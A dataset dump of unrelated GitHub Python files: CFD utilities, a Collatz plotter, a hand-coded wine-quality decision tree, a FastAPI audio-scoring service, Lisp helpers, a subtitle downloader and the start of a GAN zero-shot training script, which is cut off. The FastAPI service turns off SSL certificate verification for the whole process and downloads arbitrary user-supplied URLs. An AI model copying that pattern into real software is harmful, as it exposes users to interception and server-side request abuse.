explicity typing for improved readability\n rows = int(space.rowpts)\n cols = int(space.colpts)\n u_star = space.u_star.astype(float, copy=False)\n v_star = space.v_star.astype(float, copy=False)\n p = space.p.astype(float, copy=False)\n dx = float(space.dx)\n dy = float(space.dy)\n dt = float(space.dt)\n rho = float(fluid.rho)\n u = space.u.astype(float, copy=False)\n v = space.v.astype(float, copy=False)\n\n # Evaluate first derivative of pressure in x direction\n p1_x = (p[1 : rows + 1, 2:] - p[1 : rows + 1, 0:cols]) / (2 * dx)\n # Calculate u at next timestep\n u[1 : rows + 1, 1 : cols + 1] = (\n u_star[1 : rows + 1, 1 : cols + 1] - (dt / rho) * p1_x\n )\n\n # Evaluate first derivative of pressure in y direction\n p1_y = (p[2:, 1 : cols + 1] - p[0:rows, 1 : cols + 1]) / (2 * dy)\n # Calculate v at next timestep\n v[1 : rows + 1, 1 : cols + 1] = (\n v_star[1 : rows + 1, 1 : cols + 1] - (dt / rho) * p1_y\n )\n\n\ndef SetCentrePUV(space):\n space.p_c = space.p[1:-1, 1:-1]\n space.u_c = space.u[1:-1, 1:-1]\n space.v_c = space.v[1:-1, 1:-1]\n\n\ndef MakeResultDirectory(wipe=False):\n # Get path to the Result directory\n cwdir = os.getcwd()\n dir_path = os.path.join(cwdir, \"results\")\n # If directory does not exist, make it\n if not os.path.isdir(dir_path):\n os.makedirs(dir_path, exist_ok=True)\n else:\n # If wipe is True, remove files present in the directory\n if wipe:\n os.chdir(dir_path)\n filelist = os.listdir()\n for file in filelist:\n os.remove(file)\n\n os.chdir(cwdir)\n\n\ndef WriteToFile(space, iteration, interval):\n if iteration % interval == 0:\n dir_path = os.path.join(os.getcwd(), \"results\")\n filename = \"PUV{0}.txt\".format(iteration)\n path = os.path.join(dir_path, filename)\n with open(path, \"w\") as f:\n for i in range(space.rowpts):\n for j in range(space.colpts):\n f.write(\n \"{}\\t{}\\t{}\\n\".format(\n space.p_c[i, j], space.u_c[i, j], space.v_c[i, j]\n )\n )\n","repo_name":"lrizza/CFD","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39352237357","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 29 15:33:25 2017\n\n@author: lucfrachon\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef collatz(num):\n \n \n if num % 2 == 0:\n num /= 2\n else:\n num *= 3\n num += 1\n return num\n \n \ndef run_collatz(start):\n numbers = [start]\n num = start\n it = 0\n \n while num > 1:\n num = collatz(num)\n numbers.append(num)\n it += 1\n return numbers\n\nif __name__ == '__main__': \n\n highest_number = int(input('Highest number to sample from: '))\n num_sample = int(input('How many numbers do you want to try? 
'))\n sample = np.random.randint(1, highest_number, size = num_sample) \n lines = []\n\n for num in sample:\n print(\"Trying \", num)\n numbers = run_collatz(num)\n plt.plot(numbers, label = str(num), alpha = .3)\n plt.yscale('log')\n plt.title(\"Collatz Conjecture\")\n plt.legend(loc = 'upper right', fontsize = 'xx-small')\n \n\n \n \n","repo_name":"LucFrachon/collatz-conjecture","sub_path":"collatz_conjecture.py","file_name":"collatz_conjecture.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72404319842","text":"import random\r\nfrom random import randrange\r\nimport csv\r\nimport math\r\nalldata=[]\r\ncsv_reader = csv.reader(open('D:/csc/proj/train.csv'))\r\nfor line in csv_reader:\r\n alldata.append(line)#read the file 读取文件\r\n\r\ndef findmax(datain,parameter):# find the biggest parameter in a certain parameter\r\n previous = float(datain[0][parameter])\r\n max=previous\r\n for data in range(1,len(datain)-1):\r\n if float(datain[data][parameter])> max:\r\n max = float(datain[data][parameter])\r\n return max\r\n\r\ndef findmin(datain,parameter):# find the smallest parameter in a certain parameter\r\n previous = float(datain[0][parameter])\r\n min=previous\r\n for data in range(1,len(datain)-1):\r\n if float(datain[data][parameter])< min:\r\n min = float(datain[data][parameter])\r\n return min\r\n\r\ndef checkentropy(data0,step,parameter):#find the best dicision for a certain parameter 定义函数 父辈数据 模拟次数 下限 上限 判断参量\r\n data1=data0#父辈数据\r\n data2=[]\r\n data3=[]\r\n bigger=0\r\n smaller=0\r\n number = 0 \r\n test = findmin(data0,parameter) + step# start from the smallest one\r\n for data in range(len(data1)-1):#for classcification\r\n if eval(data1[data][parameter]) >test:#父辈相应维度参数是否大于或小于边界值\r\n data2.append(data1[data])#如果大了,把这个数据加到data2集合# bigger data\r\n else:\r\n data3.append(data1[data])#如果小了,把这个数据加到data3集合 \r\n for score in range(len(data2)-1):#算第一个子类的熵# smaller data\r\n if eval(data2[score][11]) > 6:\r\n bigger += 1\r\n else:\r\n smaller +=1\r\n gini1 = 1- ((((bigger/len(data2))**2) +((smaller/len(data2))**2)))# calculate ginic 1\r\n bigger=0\r\n smaller=0\r\n for score in range(len(data3)-1):#算第二个子类\r\n if eval(data3[score][11]) > 6:\r\n bigger += 1\r\n else:\r\n smaller +=1\r\n gini2 = 1- ((((bigger/len(data3))**2) +((smaller/len(data3))**2)))#得到第二个熵# gini 2 \r\n totalgini = (gini1 + gini2)/2#子类总熵# total gini\r\n previousgini= totalgini\r\n smallestgini = totalgini# store data for a while\r\n output = test\r\n while True:\r\n if test < findmax(data0,parameter):# count the test numbe for all\r\n number += 1\r\n else:\r\n break\r\n test+= step\r\n test = findmin(data0,parameter) + step\r\n for time in range(number): # calculate every test\r\n data2=[]\r\n data3=[]\r\n bigger=0\r\n smaller=0\r\n for data in range(len(data1)-1):\r\n if eval(data1[data][parameter]) >test:#父辈相应维度参数是否大于或小于边界值\r\n data2.append(data1[data])#如果大了,把这个数据加到data2集合\r\n else:\r\n data3.append(data1[data])#如果小了,把这个数据加到data3集合\r\n \r\n for score in range(len(data2)-1):#算第一个子类的熵\r\n if eval(data2[score][11]) > 6:\r\n bigger += 1\r\n else:\r\n smaller +=1\r\n gini1 = 1- ((((bigger/len(data2))**2) +((smaller/len(data2))**2)))#得到第一个熵\r\n bigger=0\r\n smaller=0\r\n for score in range(len(data3)-1):#算第二个子类\r\n if eval(data3[score][11]) > 6:\r\n bigger += 1\r\n else:\r\n smaller +=1\r\n gini2 = 1- ((((bigger/len(data3))**2) +((smaller/len(data3))**2)))#得到第二个熵\r\n totalgini = (gini1 + gini2)/2#子类总熵\r\n currentgini = 
totalgini\r\n \r\n if currentgini < previousgini:#大小比对# find the test that minimum the gini\r\n output = test\r\n smallestgini= currentgini\r\n previousgini = currentgini\r\n test += step\r\n print(\" \")\r\n print (\"gini is:\",smallestgini)\r\n return output\r\n\r\ndef qualityguess(six):# from here the tree begin\r\n if six > 0.85:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv2_1 = []\r\nlv2_2 = []\r\n\r\nfor data in range(len(alldata)-1):\r\n if qualityguess(float(alldata[data][1]))==2.1:\r\n lv2_1.append(alldata[data])\r\n elif qualityguess(float(alldata[data][1]))==2.2:\r\n lv2_2.append(alldata[data])\r\ncount2_1 = 0\r\ncount2_2 = 0\r\nfor score in range(len(lv2_1)-1):\r\n if float(lv2_1[score][11]) > 6 :\r\n count2_1 += 1\r\n else:\r\n count2_2 += 1 \r\n\r\nprint(count2_1,\"above 6\")\r\nprint(count2_2,\"below 6\")\r\nprint (\"the length of lv2_2\",len(lv2_2))\r\n\r\ndef qualityguess2(six):\r\n if six > 9.19:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv3_1 = []\r\nlv3_2 = []\r\n\r\nfor data in range(len(lv2_2)-1):\r\n if qualityguess2(float(lv2_2[data][10]))==2.1:\r\n lv3_1.append(lv2_2[data])\r\n elif qualityguess2(float(lv2_2[data][10]))==2.2:\r\n lv3_2.append(lv2_2[data])\r\ncount3_1 = 0\r\ncount3_2 = 0\r\nfor score in range(len(lv3_2)-1):\r\n if float(lv3_2[score][11]) > 6 :\r\n count3_1 += 1\r\n else:\r\n count3_2 += 1 \r\n\r\nprint(count3_1,\"above 6\")\r\nprint(count3_2,\"below 6\")\r\nprint (\"the length \",len(lv3_2))\r\n\r\n#print(\"for the parameter\",9,\",the output is\",checkentropy(lv2_2,0.01,9))\r\n\r\ndef qualityguess3(six):\r\n if six > 9.49:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv4_1 = []\r\nlv4_2 = []\r\n\r\nfor data in range(len(lv3_1)-1):\r\n if qualityguess3(float(lv3_1[data][10]))==2.1:\r\n lv4_1.append(lv3_1[data])\r\n elif qualityguess3(float(lv3_1[data][10]))==2.2:\r\n lv4_2.append(lv3_1[data])\r\ncount4_1 = 0\r\ncount4_2 = 0\r\nfor score in range(len(lv4_1)-1):\r\n if float(lv4_1[score][11]) > 6 :\r\n count4_1 += 1\r\n else:\r\n count4_2 += 1 \r\n\r\nprint(count4_1,\"above 6\")\r\nprint(count4_2,\"below 6\")\r\nprint (\"the length \",len(lv4_1))\r\n\r\ndef qualityguess4(six):\r\n if six > 0.54:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv5_1 = []\r\nlv5_2 = []\r\n\r\nfor data in range(len(lv4_1)-1):\r\n if qualityguess4(float(lv4_1[data][9]))==2.1:\r\n lv5_1.append(lv4_1[data])\r\n elif qualityguess4(float(lv4_1[data][9]))==2.2:\r\n lv5_2.append(lv4_1[data])\r\ncount5_1 = 0\r\ncount5_2 = 0\r\nfor score in range(len(lv5_2)-1):\r\n if float(lv5_2[score][11]) > 6 :\r\n count5_1 += 1\r\n else:\r\n count5_2 += 1 \r\n\r\nprint(count5_1,\"above 6\")\r\nprint(count5_2,\"below 6\")\r\nprint (\"the length \",len(lv5_2))\r\n\r\ndef qualityguess5(six):\r\n if six > 106:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv6_1 = []\r\nlv6_2 = []\r\n\r\nfor data in range(len(lv5_1)-1):\r\n if qualityguess5(float(lv5_1[data][6]))==2.1:\r\n lv6_1.append(lv5_1[data])\r\n elif qualityguess5(float(lv5_1[data][6]))==2.2:\r\n lv6_2.append(lv5_1[data])\r\ncount6_1 = 0\r\ncount6_2 = 0\r\nfor score in range(len(lv6_1)-1):\r\n if float(lv6_1[score][11]) > 6 :\r\n count6_1 += 1\r\n else:\r\n count6_2 += 1 \r\n\r\nprint(count6_1,\"above 6\")\r\nprint(count6_2,\"below 6\")\r\nprint (\"the length \",len(lv6_1))\r\n\r\ndef qualityguess6(six):\r\n if six > 0.6:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv7_1 = 
[]\r\nlv7_2 = []\r\n\r\nfor data in range(len(lv6_2)-1):\r\n if qualityguess6(float(lv6_2[data][1]))==2.1:\r\n lv7_1.append(lv6_2[data])\r\n elif qualityguess6(float(lv6_2[data][1]))==2.2:\r\n lv7_2.append(lv6_2[data])\r\ncount7_1 = 0\r\ncount7_2 = 0\r\nfor score in range(len(lv7_1)-1):\r\n if float(lv7_1[score][11]) > 6 :\r\n count7_1 += 1\r\n else:\r\n count7_2 += 1 \r\n\r\nprint(count7_1,\"above 6\")\r\nprint(count7_2,\"below 6\")\r\nprint (\"the length \",len(lv7_1))\r\n\r\ndef qualityguess7(six):\r\n if six > 0.109:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv8_1 = []\r\nlv8_2 = []\r\n\r\nfor data in range(len(lv7_2)-1):\r\n if qualityguess7(float(lv7_2[data][4]))==2.1:\r\n lv8_1.append(lv7_2[data])\r\n elif qualityguess7(float(lv7_2[data][4]))==2.2:\r\n lv8_2.append(lv7_2[data])\r\ncount8_1 = 0\r\ncount8_2 = 0\r\nfor score in range(len(lv8_2)-1):\r\n if float(lv8_2[score][11]) > 6 :\r\n count8_1 += 1\r\n else:\r\n count8_2 += 1 \r\n\r\nprint(count8_1,\"above 6\")\r\nprint(count8_2,\"below 6\")\r\nprint (\"the length \",len(lv8_2))\r\n\r\ndef qualityguess8(six):\r\n if six > 9.7:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv9_1 = []\r\nlv9_2 = []\r\n\r\nfor data in range(len(lv8_2)-1):\r\n if qualityguess8(float(lv8_2[data][10]))==2.1:\r\n lv9_1.append(lv8_2[data])\r\n elif qualityguess8(float(lv8_2[data][10]))==2.2:\r\n lv9_2.append(lv8_2[data])\r\ncount9_1 = 0\r\ncount9_2 = 0\r\nfor score in range(len(lv9_2)-1):\r\n if float(lv9_2[score][11]) > 6 :\r\n count9_1 += 1\r\n else:\r\n count9_2 += 1 \r\n\r\nprint(count9_1,\"above 6\")\r\nprint(count9_2,\"below 6\")\r\nprint (\"the length \",len(lv9_2))\r\n\r\ndef qualityguess9(six):\r\n if six > 56:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv10_1 = []\r\nlv10_2 = []\r\n\r\nfor data in range(len(lv9_1)-1):\r\n if qualityguess9(float(lv9_1[data][6]))==2.1:\r\n lv10_1.append(lv9_1[data])\r\n elif qualityguess9(float(lv9_1[data][6]))==2.2:\r\n lv10_2.append(lv9_1[data])\r\ncount10_1 = 0\r\ncount10_2 = 0\r\nfor score in range(len(lv10_1)-1):\r\n if float(lv10_1[score][11]) > 6 :\r\n count10_1 += 1\r\n else:\r\n count10_2 += 1 \r\n\r\nprint(count10_1,\"above 6\")\r\nprint(count10_2,\"below 6\")\r\nprint (\"the length \",len(lv10_1))\r\n\r\ndef qualityguess10(six):\r\n if six > 0.59:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv11_1 = []\r\nlv11_2 = []\r\n\r\nfor data in range(len(lv10_2)-1):\r\n if qualityguess10(float(lv10_2[data][1]))==2.1:\r\n lv11_1.append(lv10_2[data])\r\n elif qualityguess10(float(lv10_2[data][1]))==2.2:\r\n lv11_2.append(lv10_2[data])\r\ncount11_1 = 0\r\ncount11_2 = 0\r\nfor score in range(len(lv11_1)-1):\r\n if float(lv11_1[score][11]) > 6 :\r\n count11_1 += 1\r\n else:\r\n count11_2 += 1 \r\n\r\nprint(count11_1,\"above 6\")\r\nprint(count11_2,\"below 6\")\r\nprint (\"the length \",len(lv11_1))\r\n\r\ndef qualityguess11(six):\r\n if six > 3.449:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv12_1 = []\r\nlv12_2 = []\r\n\r\nfor data in range(len(lv11_2)-1):\r\n if qualityguess11(float(lv11_2[data][8]))==2.1:\r\n lv12_1.append(lv11_2[data])\r\n elif qualityguess11(float(lv11_2[data][8]))==2.2:\r\n lv12_2.append(lv11_2[data])\r\ncount12_1 = 0\r\ncount12_2 = 0\r\nfor score in range(len(lv12_1)-1):\r\n if float(lv12_1[score][11]) > 6 :\r\n count12_1 += 1\r\n else:\r\n count12_2 += 1 \r\n\r\nprint(count12_1,\"above 6\")\r\nprint(count12_2,\"below 6\")\r\nprint (\"the length 
\",len(lv12_1))\r\n\r\ndef qualityguess12(six):\r\n if six > 0.9976:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv13_1 = []\r\nlv13_2 = []\r\n\r\nfor data in range(len(lv12_2)-1):\r\n if qualityguess12(float(lv12_2[data][7]))==2.1:\r\n lv13_1.append(lv12_2[data])\r\n elif qualityguess12(float(lv12_2[data][7]))==2.2:\r\n lv13_2.append(lv12_2[data])\r\ncount13_1 = 0\r\ncount13_2 = 0\r\nfor score in range(len(lv13_1)-1):\r\n if float(lv13_1[score][11]) > 6 :\r\n count13_1 += 1\r\n else:\r\n count13_2 += 1 \r\n\r\nprint(count13_1,\"above 6\")\r\nprint(count13_2,\"below 6\")\r\nprint (\"the length \",len(lv13_1))\r\n\r\nprint(\"the output for\",0,\"is\",checkentropy(lv12_2,0.1,0))\r\nprint(\"the output for\",1,\"is\",checkentropy(lv12_2,0.01,1))\r\nprint(\"the output for\",2,\"is\",checkentropy(lv12_2,0.01,2))\r\nprint(\"the output for\",3,\"is\",checkentropy(lv12_2,0.1,3))\r\nprint(\"the output for\",4,\"is\",checkentropy(lv12_2,0.001,4))\r\nprint(\"the output for\",5,\"is\",checkentropy(lv12_2,1,5))\r\nprint(\"the output for\",6,\"is\",checkentropy(lv12_2,1,6))\r\nprint(\"the output for\",7,\"is\",checkentropy(lv12_2,0.00001,7))\r\nprint(\"the output for\",8,\"is\",checkentropy(lv12_2,0.01,8))\r\nprint(\"the output for\",9,\"is\",checkentropy(lv12_2,0.01,9))\r\nprint(\"the output for\",10,\"is\",checkentropy(lv12_2,0.1,10))","repo_name":"GavinZhang-0503/data-classfication-of-wine-quanlity","sub_path":"src/BuidingCART ver2.py","file_name":"BuidingCART ver2.py","file_ext":"py","file_size_in_byte":12203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"32601332719","text":"from fastapi import FastAPI, File, Form, UploadFile\nfrom starlette.middleware.cors import CORSMiddleware\n\nfrom app.api.routes import api_router\nfrom app.schemas.audio import Evaluation\nfrom app.utils.init_db import init_db\nfrom app.utils.settings import get_settings\nfrom db import db\nimport asyncio\nfrom pydub import AudioSegment\n\nfrom files.parse_files import parse_file\n\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.utils import custom_object_scope\nfrom tensorflow.keras.models import load_model\nfrom keras import backend as K\nimport os\nfrom urllib.request import urlopen, urlretrieve\nimport ssl\nfrom app.utils.audio import process_audio\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nmodel = None\n\ndef initialize_weights(shape, dtype=None):\n return np.random.normal(loc=0.0, scale=1e-2, size=shape)\n\n\ndef initialize_bias(shape, dtype=None):\n return np.random.normal(loc=0.5, scale=1e-2, size=shape)\n\n \n\nsettings = get_settings()\n\napp = FastAPI(\n title=settings.PROJECT_NAME, openapi_url=f\"{settings.API_V1_STR}/openapi.json\"\n)\n\n# Set all CORS enabled originsss\nif settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\napp.include_router(api_router)\n\n@app.on_event(\"startup\")\nasync def startup():\n await db.connect()\n await init_db()\n with custom_object_scope(\n {\n \"initialize_weights\": initialize_weights,\n \"initialize_bias\": initialize_bias,\n \"K\": K,\n }\n ):\n global model\n model = load_model(\"model-2.h5\")\n \n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await db.disconnect()\n\n@app.get(\"/\")\ndef read_root():\n return {\"version\": 
\"1.0.0\"}\n\n@app.post(\"/audio/evaluate\")\nasync def evaluate_audio(ref_url: str = Form(...), file: UploadFile = File(...)):\n \n\n audio_name = ref_url.split(\"/\")[-1]\n ref_path = f\"files/audio/{audio_name}\"\n urlretrieve(ref_url, ref_path)\n\n test_path = f\"files/audio/{file.filename}\"\n with open(test_path, \"wb\") as f:\n f.write(await file.read())\n\n f.close()\n \n wav_ref = f\"files/audio/audio1.wav\"\n wav_test = f\"files/audio/audio2.wav\"\n \n audio = AudioSegment.from_file(ref_path)\n audio.export(wav_ref, format=\"wav\")\n \n audio1 = AudioSegment.from_file(test_path)\n audio1.export(wav_test, format=\"wav\")\n\n ref_audio = process_audio(wav_ref)\n test_audio = process_audio(wav_test)\n\n os.remove(ref_path)\n os.remove(test_path)\n os.remove(wav_test)\n os.remove(wav_ref)\n\n prediction = model.predict([ref_audio, test_audio])\n prediction_score = prediction[0][0]\n\n if prediction_score <= 0.25:\n return Evaluation(prediction=1)\n elif 0.25 < prediction_score <= 0.5:\n return Evaluation(prediction=2)\n else:\n return Evaluation(prediction=3)\n","repo_name":"RaheemWilson/chatgud-backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18090679171","text":"from tokens import *\n\ndef grab_lisp_statement(stack, keep_parentheses = False, error_message = \"Missing closing parentheses\"):\n\n paren_count = 1\n \n ret_val = list()\n\n if not keep_parentheses:\n stack.pop()\n else:\n ret_val.append(stack.pop())\n \n \n while paren_count > 0:\n assert len(stack) > 0, error_message\n ret_val.append(stack.pop())\n if ret_val[-1][0] == TokenType.LEFT_PARENTHESES:\n paren_count += 1\n elif ret_val[-1][0] == TokenType.RIGHT_PARENTHESES:\n paren_count -= 1\n \n if not keep_parentheses:\n ret_val.pop()\n\n ret_val.reverse()\n\n return ret_val\n\ndef run_lisp_stack(stack, parser):\n from lparser import LispParser\n par = LispParser()\n par.scope.parent = parser.scope\n par.parse_stack(stack)\n return par.scope.stack\n\ndef evaluate_lisp_stack(stack, parser):\n res_stack = run_lisp_stack(stack, parser)\n if len(res_stack) > 0:\n return res_stack.pop()\n else:\n return (TokenType.NIL, None)\n\ndef get_next_stack_value(stack, parser):\n if stack[-1][0] == TokenType.LEFT_PARENTHESES:\n return evaluate_lisp_stack(grab_lisp_statement(stack, keep_parentheses=True), parser)\n else:\n return stack.pop()\n","repo_name":"DaDarkWizard/ModelingTheThinking","sub_path":"DaskersThoughts/lhelpers.py","file_name":"lhelpers.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23726471143","text":"#!/usr/bin/env python3\n\nimport argparse\nimport locale\nimport os\nimport sys\nfrom downloader import Downloader\nfrom query import Query\nfrom subscene import SubScene\nfrom subclub import SubClub\n\nif __name__ == \"__main__\":\n default_lang = locale.getdefaultlocale()[0][:2]\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\", help=\"Name or file to search\")\n parser.add_argument(\"-c\", \"--count\", type=int, default=1, help=\"Maximum number of files to download\")\n parser.add_argument(\"-l\", \"--lang\", default=default_lang, help=\"Language of the subtitles\")\n\n args = parser.parse_args()\n\n name = args.file\n root = os.getcwd()\n\n if os.path.isfile(name):\n root = os.path.dirname(name)\n\n query = 
Query.parse(os.path.basename(args.file))\n\n if not query:\n print(\"Could not parse the query\")\n sys.exit(1)\n\n print(\"Searching for matches...\", end=\"\", flush=True)\n\n dl = Downloader([\n SubClub(),\n SubScene()\n ])\n results = dl.get(query, args.count, args.lang)\n\n print(\" found %i\" % len(results))\n for file in results:\n print(\"Writing %s\" % file.write(root))\n","repo_name":"LKarel/subdl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22851223281","text":"from Bio.config.DBRegistry import CGIDB, DBGroup\nfrom _support import *\n\n# This returns HTML-formatted data. Is there a way to get raw text?\ninterpro_ebi_cgi = CGIDB(\n name=\"interpro-ebi-cgi\",\n cgi='http://www.ebi.ac.uk/interpro/IEntry',\n doc=\"Retrieve an InterPro entry\",\n delay=5.0,\n key=\"ac\",\n failure_cases=[(has_str(\"No InterPro entry\"), \"No InterPro entry\")]\n )\n\ninterpro = DBGroup(\n name = \"interpro\",\n behavior = \"serial\"\n )\ninterpro.add(interpro_ebi_cgi)\n","repo_name":"dbmi-pitt/DIKB-Micropublication","sub_path":"scripts/mp-scripts/Bio/dbdefs/interpro.py","file_name":"interpro.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"40943544447","text":"from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport math\nimport util\nimport classifier\nimport classifier2\nimport sys\nimport model\nimport numpy as np\nimport time\nimport torch.nn.functional as F\nfrom sklearn.cluster import KMeans\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', default='FLO', help='FLO')\nparser.add_argument('--dataroot', default='/home/poxiaoge/Documents/dataset/ZSL', help='path to dataset')\nparser.add_argument('--matdataset', default=True, help='Data in matlab format')\nparser.add_argument('--image_embedding', default='res101')\nparser.add_argument('--class_embedding', default='att')\nparser.add_argument('--syn_num', type=int, default=100, help='number features to generate per class')\nparser.add_argument('--gzsl', action='store_true', default=False, help='enable generalized zero-shot learning')\nparser.add_argument('--preprocessing', action='store_true', default=False,\n help='enbale MinMaxScaler on visual features')\nparser.add_argument('--standardization', action='store_true', default=False)\nparser.add_argument('--validation', action='store_true', default=False, help='enable cross validation mode')\nparser.add_argument('--workers', type=int, help='number of data loading workers', default=2)\nparser.add_argument('--batch_size', type=int, default=64, help='input batch size')\nparser.add_argument('--resSize', type=int, default=2048, help='size of visual features')\nparser.add_argument('--attSize', type=int, default=1024, help='size of semantic features')\nparser.add_argument('--nz', type=int, default=312, help='size of the latent z vector')\nparser.add_argument('--ngh', type=int, default=4096, help='size of the hidden units in generator')\nparser.add_argument('--ndh', type=int, default=1024, help='size of the hidden units in discriminator')\nparser.add_argument('--nepoch', type=int, default=2000, help='number of epochs to train 
for')\nparser.add_argument('--critic_iter', type=int, default=5, help='critic iteration, following WGAN-GP')\nparser.add_argument('--lambda1', type=float, default=10, help='gradient penalty regularizer, following WGAN-GP')\nparser.add_argument('--cls_weight', type=float, default=1, help='weight of the classification loss')\nparser.add_argument('--lr', type=float, default=0.0001, help='learning rate to train GANs ')\nparser.add_argument('--classifier_lr', type=float, default=0.001, help='learning rate to train softmax classifier')\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--cuda', action='store_true', default=False, help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')\nparser.add_argument('--pretrain_classifier', default='', help=\"path to pretrain classifier (to continue training)\")\nparser.add_argument('--netG', default='', help=\"path to netG (to continue training)\")\nparser.add_argument('--netD', default='', help=\"path to netD (to continue training)\")\nparser.add_argument('--netG_name', default='')\nparser.add_argument('--netD_name', default='')\nparser.add_argument('--outf', default='./checkpoint/', help='folder to output data and model checkpoints')\nparser.add_argument('--outname', help='folder to output data and model checkpoints')\nparser.add_argument('--save_every', type=int, default=100)\nparser.add_argument('--print_every', type=int, default=1)\nparser.add_argument('--val_every', type=int, default=10)\nparser.add_argument('--start_epoch', type=int, default=0)\nparser.add_argument('--manualSeed', type=int, help='manual seed')\nparser.add_argument('--nclass_all', type=int, default=200, help='number of all classes')\nparser.add_argument('--ratio', type=float, default=0.2, help='ratio of easy samples')\nparser.add_argument('--proto_param1', type=float, default=0.01, help='proto param 1')\nparser.add_argument('--proto_param2', type=float, default=0.01, help='proto param 2')\nparser.add_argument('--loss_syn_num', type=int, default=20, help='number of real clusters')\nparser.add_argument('--n_clusters', type=int, default=3, help='number of real clusters')\n\n\ndef GetNowTime():\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time.time()))\n\nprint(GetNowTime())\nprint('Begin run!!!')\nsince = time.time()\n\nopt = parser.parse_args()\nprint('Params: dataset={:s}, GZSL={:s}, ratio={:.1f}, cls_weight={:.4f}, proto_param1={:.4f}, proto_param2={:.4f}'.format(\n opt.dataset, str(opt.gzsl), opt.ratio, opt.cls_weight,opt.proto_param1, opt.proto_param2))\nsys.stdout.flush()\n\nif opt.manualSeed is None:\n opt.manualSeed = random.randint(1, 10000)\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\nif opt.cuda:\n torch.cuda.manual_seed_all(opt.manualSeed)\n\ncudnn.benchmark = True\n\nif torch.cuda.is_available() and not opt.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n# load data\ndata = util.DATA_LOADER(opt)\nprint(\"Training samples: \", data.ntrain)\n\n# initialize generator and discriminator\nnetG = model.MLP_G(opt)\nif opt.netG != '':\n netG.load_state_dict(torch.load(opt.netG))\n# print(netG)\n\nnetD = model.MLP_CRITIC(opt)\nif opt.netD != '':\n netD.load_state_dict(torch.load(opt.netD))\n# print(netD)\n\n# classification loss, Equation (4) of the paper\ncls_criterion = nn.NLLLoss()\n\ninput_res = torch.FloatTensor(opt.batch_size, 
opt.resSize)\ninput_att = torch.FloatTensor(opt.batch_size, opt.attSize)\nnoise = torch.FloatTensor(opt.batch_size, opt.nz)\none = torch.FloatTensor([1])\nmone = one * -1\ninput_label = torch.LongTensor(opt.batch_size)\n\nif opt.cuda:\n netD.cuda()\n netG.cuda()\n input_res = input_res.cuda()\n noise, input_att = noise.cuda(), input_att.cuda()\n one = one.cuda()\n mone = mone.cuda()\n cls_criterion.cuda()\n input_label = input_label.cuda()\n\n\ndef sample():\n batch_feature, batch_label, batch_att = data.next_batch(opt.batch_size)\n input_res.copy_(batch_feature)\n input_att.copy_(batch_att)\n input_label.copy_(util.map_label(batch_label, data.seenclasses))\n\n\ndef generate_syn_feature(netG, classes, attribute, num):\n nclass = classes.size(0)\n syn_feature = torch.FloatTensor(nclass * num, opt.resSize)\n syn_label = torch.LongTensor(nclass * num)\n syn_att = torch.FloatTensor(num, opt.attSize)\n syn_noise = torch.FloatTensor(num, opt.nz)\n if opt.cuda:\n syn_att = syn_att.cuda()\n syn_noise = syn_noise.cuda()\n\n for i in range(nclass):\n iclass = classes[i]\n iclass_att = attribute[iclass]\n syn_att.copy_(iclass_att.repeat(num, 1))\n syn_noise.normal_(0, 1)\n output = 